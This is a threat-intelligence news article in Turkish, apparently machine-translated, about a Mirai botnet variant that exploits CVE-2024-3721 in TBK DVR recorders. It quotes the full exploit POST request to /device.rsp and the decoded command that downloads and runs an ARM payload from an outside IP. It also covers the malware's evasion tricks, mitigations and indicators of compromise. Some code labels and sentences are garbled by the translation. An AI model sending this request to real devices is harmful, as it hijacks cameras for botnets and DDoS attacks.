Mirai Botnet aktivitesinin en son dalgası, TBK DVR-4104 ve DVR-4216 cihazlarında kritik bir komut enjeksiyon güvenlik açığı olan CVE-2024-3721’den yararlanan rafine bir saldırı zinciri ile yeniden ortaya çıktı.
Bu kampanya, IoT cihaz kaçırma ve DDOS işlemleri için tasarlanmış değiştirilmiş bir Mirai varyantını dağıtmak için kapatılmamış ürün yazılımından yararlanır.
Sömürü vektörü ve yük teslimatı
Saldırganlar, hazırlanmış HTTP Post talepleri aracılığıyla güvenlik açığından yararlanıyor. /device.rsp uç nokta.
.png
)
Enjekte edilen komut bir ARM32 ikili indirir ve yürütür:
textPOST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F42.112.26.36%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1
Kod çözülmüş kabuk komut dosyası:
bashcd /tmp; rm arm7; wget http://42.112.26[.]36/arm7; chmod 777 *; ./arm7 tbk
Bu kolaylaştırılmış yük, özellikle ARM32 tabanlı DVR sistemlerini hedefleyen mimarlık keşiflerini atlar.
Kötü amaçlı yazılım değişiklikleri ve kaçınma taktikleri
Mirai varyantı birkaç yükseltme içerir:
1. RC4 String Şifreleme
- XOR ile şifreli RC4 anahtarını kullanır:
6e7976666525a97639777d2d7f303177 - Bir gelenekte depolanan şifre çözülmüş dizeler
DataDecryptedÇalışma zamanı erişimi için yapı
2. Anti-analiz kontrolleri
- Tarama
/proc/[PID]/cmdlineVMware/QEMU göstergeleri için - Sabit kodlanmış dizinlere karşı yürütme yolunu doğrular: metin
/dev/shm /tmp /var/run
3. Beyaz liste işlemi
Gibi rakip kötü amaçlı yazılım süreçlerini sonlandırır Hajime– AnarchyVe Mozi cihaz kaynaklarını tekelleştirmek için.
Enfeksiyon metrikleri ve azaltma
Telemetri verileri Çin, Hindistan, Mısır, Ukrayna, Rusya, Türkiye ve Brezilya’da konsantre enfeksiyonları ortaya koymaktadır.
50.000’den fazla maruz kalan DVR cihazı küresel olarak savunmasız kalıyor ve saldırganlar Shodan listesindeki hedefleri aktif olarak tarıyor.
| Azaltma stratejisi | Uygulama |
|---|---|
| Ürün yazılımı yaması | TBK’nın 20240412+ güncellemelerini uygulayın |
| Ağ segmentasyonu | DVR’leri kritik altyapıdan izole |
| Giriş Sterizizasyonu | Özel karakterleri engelleyin mdb/mdc parametreler |
Kaspersky ürünleri bu varyant HEUR:Backdoor.Linux.Mirai Ve HEUR:Backdoor.Linux.Gafgyt.
Cihaz sahipleri, ürün yazılımı güncellemelerine öncelik vermeli ve tehlikeye atılan birimler için fabrika sıfırlamalarını düşünmelidir.
Uzlaşma göstergeleri
textIPs: 116.203.104[.]203, 130.61.64[.]122, 161.97.219[.]84
MD5: 011a406e89e603e93640b10325ebbdc8, 24fd043f9175680d0c061b28a2801dfc
Bu kampanya, endüstriyel gözetim sistemlerinde miras IoT güvenlik açıklarının kalıcı tehdidinin altını çiziyor.
Mirai Codebase’in sürekli evrimi, tehdit oyuncularının stratejik değişiklikler yoluyla on yıllık kötü amaçlı yazılımları silahlandırma yeteneğini göstermektedir.
Siber güvenlik becerilerinizi yükseltmek için 150’den fazla pratik siber güvenlik kursuyla elmas üyeliği alın – buraya kaydolun